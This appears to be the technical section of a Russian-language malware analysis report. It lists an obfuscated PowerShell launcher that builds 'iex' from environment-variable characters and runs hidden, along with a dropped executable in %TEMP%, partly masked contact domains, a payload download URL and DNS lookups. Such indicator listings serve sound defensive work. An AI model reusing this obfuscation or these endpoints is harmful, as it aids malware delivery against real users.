Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' . ( $EnV:COMspeC[4,15,25]-jOIN'')(-JOin ( [cHAr[]] ( 32 , 74,92 , 110 , 73 , 69 ,36 , 57,36 , 106,97 , 115 ,41,107,102,110,97 ,103 , 112, 36 , 118,101, 106 ,96 ,107,105,63 ,32, 109 ,110, 66,77 ...
- %TEMP%\255991.exe
- %TEMP%\255991.exe
- 'an####n-davies.com':80
- 'yo##ube.com':443
- 'pk#.goog':80
- 'te####argain.com':80
- http://www.an####n-davies.com/OYyWdYIBN/
- http://pk#.goog/gsr1/gsr1.crt
- 'yo##ube.com':443
- DNS ASK ic##lc.net
- DNS ASK an####n-davies.com
- DNS ASK yo##ube.com
- DNS ASK pk#.goog
- DNS ASK te####argain.com
- DNS ASK cl##le6.com
- DNS ASK ae##pic.nl
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' . ( $EnV:COMspeC[4,15,25]-jOIN'')(-JOin ( [cHAr[]] ( 32 , 74,92 , 110 , 73 , 69 ,36 , 57,36 , 106,97 , 115 ,41,107,102,110,97 ,103 , 112, 36 , 118,101, 106 ,96 ,107,105,63 ,32, 109 ,110, 66,77 ...' (со скрытым окном)